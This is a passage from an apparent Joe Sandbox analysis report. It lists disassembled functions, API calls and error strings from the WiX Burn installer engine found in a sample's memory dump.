                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringType
                                                                                                                                                          • String ID: AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to set symbol value.$NOT$Symbol was too long: %ls$d:\a\wix\wix\src\burn\engine\condition.cpp
                                                                                                                                                          • API String ID: 4177115715-4053269478
                                                                                                                                                          • Opcode ID: acc0b46cc2cc7ef0e527b5bcc95e497c9fdaa649643eb190be8ab126741d43f1
                                                                                                                                                          • Instruction ID: 707170ce4314e62120d2e792c8b80d09a3f15f06475cb7fe9325cbaffe026237
                                                                                                                                                          • Opcode Fuzzy Hash: acc0b46cc2cc7ef0e527b5bcc95e497c9fdaa649643eb190be8ab126741d43f1
                                                                                                                                                          • Instruction Fuzzy Hash: 56020271640201FAEB248F56C889BBA7B64EB04704F504D6BF904BA2C1D3BDD9A1C799
                                                                                                                                                          Function 0044B1AF Relevance: 31.8, APIs: 2, Strings: 16, Instructions: 347threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetExitCodeThread.KERNEL32(6C696146,?,00000001,004220B6,00000000,000000FF,000000B0,00000000,?,004220B6,004220B6,?,?,?,000000B0), ref: 0044B271
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0044B27F
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\apply.cpp, xrefs: 0044B2A3, 0044B2A9, 0044B2BD, 0044B520, 0044B52B, 0044B548, 0044B594
                                                                                                                                                          • Failed to execute uninstall MSI compatible package., xrefs: 0044B567
                                                                                                                                                          • Failed to execute MSP package., xrefs: 0044B3C6
                                                                                                                                                          • Failed to wait for cache check-point., xrefs: 0044B553
                                                                                                                                                          • Failed to execute begin MSI transaction action., xrefs: 0044B492
                                                                                                                                                          • Failed to execute dependency action., xrefs: 0044B461
                                                                                                                                                          • Failed to get cache thread exit code., xrefs: 0044B2AF
                                                                                                                                                          • Failed to execute package provider registration action., xrefs: 0044B434
                                                                                                                                                          • Failed to execute commit MSI transaction action., xrefs: 0044B4BF
                                                                                                                                                          • Invalid execute action., xrefs: 0044B57B
                                                                                                                                                          • Failed to execute EXE package., xrefs: 0044B354
                                                                                                                                                          • Failed to execute MSI package., xrefs: 0044B38D
                                                                                                                                                          • Failed to execute related bundle., xrefs: 0044B2E4
                                                                                                                                                          • Failed to execute MSU package., xrefs: 0044B407
                                                                                                                                                          • Failed to execute BUNDLE package., xrefs: 0044B31C
                                                                                                                                                          • Cache thread exited unexpectedly with exit code: %u., xrefs: 0044B536
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CodeErrorExitLastThread
                                                                                                                                                          • String ID: Cache thread exited unexpectedly with exit code: %u.$Failed to execute BUNDLE package.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute begin MSI transaction action.$Failed to execute commit MSI transaction action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to execute related bundle.$Failed to execute uninstall MSI compatible package.$Failed to get cache thread exit code.$Failed to wait for cache check-point.$Invalid execute action.$d:\a\wix\wix\src\burn\engine\apply.cpp
                                                                                                                                                          • API String ID: 1352145401-1463600071
                                                                                                                                                          • Opcode ID: 8e502bd8ab876c84e0da2fdbe1041f0dac8c37ff456ed94aa44118e714ee08cd
                                                                                                                                                          • Instruction ID: c94ca12f10d659596cd7d4aab0546f69f7586f83fcd9201a77ede8270b6ad299
                                                                                                                                                          • Opcode Fuzzy Hash: 8e502bd8ab876c84e0da2fdbe1041f0dac8c37ff456ed94aa44118e714ee08cd
                                                                                                                                                          • Instruction Fuzzy Hash: 73B1A171A4021ABBFF21DE45CC46FAB7B68EB05B54F114066B904BB2D1E3B4ED408BD8
                                                                                                                                                          Function 00418228 Relevance: 31.8, APIs: 4, Strings: 14, Instructions: 268registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00405B5B: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000001,00000000,?,00417261,00000001,00000080,?,00000000), ref: 00405B73
                                                                                                                                                            • Part of subcall function 00405B5B: GetLastError.KERNEL32(?,00417261,00000001,00000080,?,00000000,?,00418D09,00000001,00000140,?,?,?,?,?,000000B0), ref: 00405B80
                                                                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,00000080,000000B0,?,00000000,00000000,00000000,?,?,?,?,?,00000001,?,?), ref: 004182A2
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0041852E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateCriticalErrorFileInitializeLastSection
                                                                                                                                                          • String ID: %s\%s$Failed to build variable registry key path.$Failed to create registration variable key.$Failed to delete registration variable value.$Failed to enumerate value %u$Failed to get variable value.$Failed to query registration variable count.$Failed to read variables.$Failed to set variable value.$Failed to write state to file: %ls$Unsupported variable type.$d:\a\wix\wix\src\burn\engine\registration.cpp$feclient.dll$variables
                                                                                                                                                          • API String ID: 620435854-861404221
                                                                                                                                                          • Opcode ID: c1cb9f6d7b499544936bfcfd0ccbc5f299ad0c95d2ff2fce4cf53f29b787e3c2
                                                                                                                                                          • Instruction ID: 254c8dd916608e62c7d600b8e5f510bd513f47cce8482f30e51c00856938d190
                                                                                                                                                          • Opcode Fuzzy Hash: c1cb9f6d7b499544936bfcfd0ccbc5f299ad0c95d2ff2fce4cf53f29b787e3c2
                                                                                                                                                          • Instruction Fuzzy Hash: 6881F931D40629BBDB229A948C4AFDF7B38EB04714F15012BFA00761D0FBBD5D818B99
                                                                                                                                                          Function 00473598 Relevance: 31.8, APIs: 6, Strings: 12, Instructions: 254COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00473812
                                                                                                                                                          Strings
                                                                                                                                                          • Failed get attributes on ATOM unknown element., xrefs: 004735CB
                                                                                                                                                          • Failed to allocate ATOM category scheme., xrefs: 00473674
                                                                                                                                                          • scheme, xrefs: 00473649
                                                                                                                                                          • Failed to parse unknown ATOM category element: %ls, xrefs: 004737E8
                                                                                                                                                          • Failed to process all ATOM category elements., xrefs: 004737C7
                                                                                                                                                          • term, xrefs: 0047368A
                                                                                                                                                          • Failed to get child nodes of ATOM category element., xrefs: 00473746
                                                                                                                                                          • Failed to process all ATOM category attributes., xrefs: 00473701
                                                                                                                                                          • label, xrefs: 00473607
                                                                                                                                                          • Failed to allocate ATOM category term., xrefs: 00473715
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 004735DA, 004737D6, 004737F7
                                                                                                                                                          • Failed to allocate ATOM category label., xrefs: 00473633
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString
                                                                                                                                                          • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM category label.$Failed to allocate ATOM category scheme.$Failed to allocate ATOM category term.$Failed to get child nodes of ATOM category element.$Failed to parse unknown ATOM category element: %ls$Failed to process all ATOM category attributes.$Failed to process all ATOM category elements.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$label$scheme$term
                                                                                                                                                          • API String ID: 3341692771-2380824584
                                                                                                                                                          • Opcode ID: 4afee97bc1c9c2f494c4c48876c66ba7ced0285145ab975b9439d940afc83522
                                                                                                                                                          • Instruction ID: 6ad69de506c9f22f2a11d2c79a7386fc0e59224c55d27ba36433fc486aa4bae8
                                                                                                                                                          • Opcode Fuzzy Hash: 4afee97bc1c9c2f494c4c48876c66ba7ced0285145ab975b9439d940afc83522
                                                                                                                                                          • Instruction Fuzzy Hash: 7781F571A44205FBDB119F94CC45F9E3775EB84B16F20806AF519B72E0EB789B00EB58
                                                                                                                                                          Function 00473865 Relevance: 31.7, APIs: 5, Strings: 13, Instructions: 245COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00473AC0
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to parse unknown ATOM content element: %ls, xrefs: 00473A69
                                                                                                                                                          • crypt32.dll, xrefs: 004739FB
                                                                                                                                                          • Failed to allocate ATOM content scheme., xrefs: 0047399D
                                                                                                                                                          • type, xrefs: 004738D4
                                                                                                                                                          • Failed to get child nodes of ATOM content element., xrefs: 004739CE
                                                                                                                                                          • Failed to allocate ATOM content value., xrefs: 00473A9A
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 004738A7, 00473A78, 00473AA9
                                                                                                                                                          • Failed get attributes on ATOM unknown element., xrefs: 00473898
                                                                                                                                                          • Failed to process all ATOM content elements., xrefs: 00473A55
                                                                                                                                                          • feclient.dll, xrefs: 00473A8E
                                                                                                                                                          • Failed to process all ATOM content attributes., xrefs: 00473989
                                                                                                                                                          • url, xrefs: 00473912
                                                                                                                                                          • Failed to allocate ATOM content type., xrefs: 004738FC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeString
                                                                                                                                                          • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM content scheme.$Failed to allocate ATOM content type.$Failed to allocate ATOM content value.$Failed to get child nodes of ATOM content element.$Failed to parse unknown ATOM content element: %ls$Failed to process all ATOM content attributes.$Failed to process all ATOM content elements.$crypt32.dll$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$feclient.dll$type$url
                                                                                                                                                          • API String ID: 3341692771-3243200183
                                                                                                                                                          • Opcode ID: 0c2851f67ff8830eb28b7875337647320f33c5e7409bbbf29388d7028fa9f810
                                                                                                                                                          • Instruction ID: ff25ad79579f58cbfb13893a4404c1c09f346fde25b9080a1c9eadb829d837f5
                                                                                                                                                          • Opcode Fuzzy Hash: 0c2851f67ff8830eb28b7875337647320f33c5e7409bbbf29388d7028fa9f810
                                                                                                                                                          • Instruction Fuzzy Hash: D581D675A40204FBDB01DF94CC46FEE7775AB44715F20406AFA09BB2E0DB749A40EB98
                                                                                                                                                          Function 00408874 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 200synchronizationCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,crypt32.dll,?,00000001), ref: 00408AC7
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,004095F6,?,?,?), ref: 00408AD0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleMutexRelease
                                                                                                                                                          • String ID: Failed to connect to unelevated process.$Failed to create elevated logging thread.$Failed to create finished event for logging thread.$Failed to create log event for logging thread.$Failed to create the message window.$Failed to open elevated log.$Failed to pump messages from parent process.$crypt32.dll$d:\a\wix\wix\src\burn\engine\engine.cpp$msasn1.dll
                                                                                                                                                          • API String ID: 4207627910-4066673956
                                                                                                                                                          • Opcode ID: 7b6137b488b4d3e8eef0cac8dffa08ca2de5702372b47df60aac6b710b6fe480
                                                                                                                                                          • Instruction ID: fb83d1f43845b470b7c0cd89ab569b688db879491577e5f3ee52a1d52e6f885f
                                                                                                                                                          • Opcode Fuzzy Hash: 7b6137b488b4d3e8eef0cac8dffa08ca2de5702372b47df60aac6b710b6fe480
                                                                                                                                                          • Instruction Fuzzy Hash: FF51F873A40626B7D7229A508D49FE7BA5CBF44750F11423BF948F61C1EB78AC108BE9
                                                                                                                                                          Function 0041733A Relevance: 30.0, APIs: 1, Strings: 16, Instructions: 207registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00418D36,InstallerVersion,InstallerVersion,00000000,00418D36,InstallerName,InstallerName,00000000,00418D36,Date,InstalledDate,00000000,00418D36,LogonUser), ref: 004175C0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled$d:\a\wix\wix\src\burn\engine\registration.cpp
                                                                                                                                                          • API String ID: 3535843008-3664035481
                                                                                                                                                          • Opcode ID: 4abd3f1c90f133ad8869e101a0d51fa6af881ab281b868e4a375fa50997a65f5
                                                                                                                                                          • Instruction ID: 96314f998e5ae91cc3e2fdc8bd364f86dd058d196683eca20ee353ff3edf4426
                                                                                                                                                          • Opcode Fuzzy Hash: 4abd3f1c90f133ad8869e101a0d51fa6af881ab281b868e4a375fa50997a65f5
                                                                                                                                                          • Instruction Fuzzy Hash: FB51E631BC5B24BAE72275018C0BFEF2E399B50F15F214517B904791D1A7EC9E80979D
                                                                                                                                                          Function 0041A936 Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 175COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: %ls.Cache$%ls.Log$Failed to allocate name of parent cache pipe.$Failed to allocate name of parent logging pipe.$Failed to open companion process with PID: %u$Failed to open parent cache pipe: %ls$Failed to open parent pipe: %ls$Failed to verify parent cache pipe: %ls$Failed to verify parent logging pipe: %ls$Failed to verify parent pipe: %ls$clbcatq.dll$comres.dll$d:\a\wix\wix\src\burn\engine\burnpipe.cpp$feclient.dll$msasn1.dll
                                                                                                                                                          • API String ID: 0-1224607240
                                                                                                                                                          • Opcode ID: 2af1cc1ea411f287583b62096cb0a282a61ea4cd0633adce69cfe2dbfd1d451a
                                                                                                                                                          • Instruction ID: 5a83bd40cafb034449813dc0a92a8bdc490791816c21fe9b43c600f0ce52ab9f
                                                                                                                                                          • Opcode Fuzzy Hash: 2af1cc1ea411f287583b62096cb0a282a61ea4cd0633adce69cfe2dbfd1d451a
                                                                                                                                                          • Instruction Fuzzy Hash: 4551E732A81625BBDB12A651CD06FDF7A659F04B50F110513FA04BA1D0E3E8ADA097DE
                                                                                                                                                          Function 00471BB1 Relevance: 28.3, APIs: 6, Strings: 10, Instructions: 297filememoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,000000FF,?,?,00000078,00000000), ref: 00471BEB
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00471BF9
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 00471C57
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00471C66
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00471EE0
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00471EEF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
                                                                                                                                                          • String ID: Content-Length not returned for URL: %ls$Failed to allocate buffer to download files into.$Failed to allocate range request header.$Failed to create download destination file: %ls$Failed to request URL for download: %ls$Failed while reading from internet and writing to: %ls$GET$Range request not supported for URL: %ls$\gG$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                          • API String ID: 2028584396-2432748424
                                                                                                                                                          • Opcode ID: 586e683aa797c212f4a06f1cd9a26201b0ddc053e05e67015a8c8a4cc637efe0
                                                                                                                                                          • Instruction ID: 5a7bf328f4068dede46326ed7f675698588ede90606f7e63601f7e1e10918e9f
                                                                                                                                                          • Opcode Fuzzy Hash: 586e683aa797c212f4a06f1cd9a26201b0ddc053e05e67015a8c8a4cc637efe0
                                                                                                                                                          • Instruction Fuzzy Hash: 85A1B371E00219ABDB219F998C45FEF7B79EF44714F11812AFD08B72A0E7789D409B98
                                                                                                                                                          Function 00416720 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 263COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0041692D
                                                                                                                                                            • Part of subcall function 004073CD: GetProcessHeap.KERNEL32(?,?,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073DE
                                                                                                                                                            • Part of subcall function 004073CD: HeapAlloc.KERNEL32(00000000,?,00403A7B,00000000,00000001,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004073E5
                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004168D7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeHeapString$AllocProcess
                                                                                                                                                          • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$d:\a\wix\wix\src\burn\engine\registration.cpp
                                                                                                                                                          • API String ID: 3351553325-1602946341
                                                                                                                                                          • Opcode ID: e90e4914ff4a170bef47ba731f7bfddf83fec363cc606fac63d5e4d8c6354bfa
                                                                                                                                                          • Instruction ID: df46a41de04da4091ebf1c336247451dece6131d8de4958a5fa93105c896dec4
                                                                                                                                                          • Opcode Fuzzy Hash: e90e4914ff4a170bef47ba731f7bfddf83fec363cc606fac63d5e4d8c6354bfa
                                                                                                                                                          • Instruction Fuzzy Hash: 54811371B40304BBDB10AA558C46FAF77699F80B14F22406FFA04BB2D1E7B8D941879C
                                                                                                                                                          Function 00408B53 Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 262windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • IsWindow.USER32(004777B0), ref: 00408E14
                                                                                                                                                          • PostMessageW.USER32(004777B0,00000010,00000000,00000000), ref: 00408E27
                                                                                                                                                          Strings
                                                                                                                                                          • WixBundleOriginalSource, xrefs: 00408C6A
                                                                                                                                                          • Failed to set layout directory variable to value provided from command-line., xrefs: 00408D61
                                                                                                                                                          • Failed to set command line action variable., xrefs: 00408CFE
                                                                                                                                                          • Failed to query registration., xrefs: 00408C4F
                                                                                                                                                          • Failed to check global conditions, xrefs: 00408BEE
                                                                                                                                                          • Failed to open log., xrefs: 00408BA3
                                                                                                                                                          • WixBundleLayoutDirectory, xrefs: 00408D50
                                                                                                                                                          • Failed to create the message window., xrefs: 00408C2C
                                                                                                                                                          • msasn1.dll, xrefs: 00408B83
                                                                                                                                                          • Failed to load BootstrapperExtensions., xrefs: 00408D91
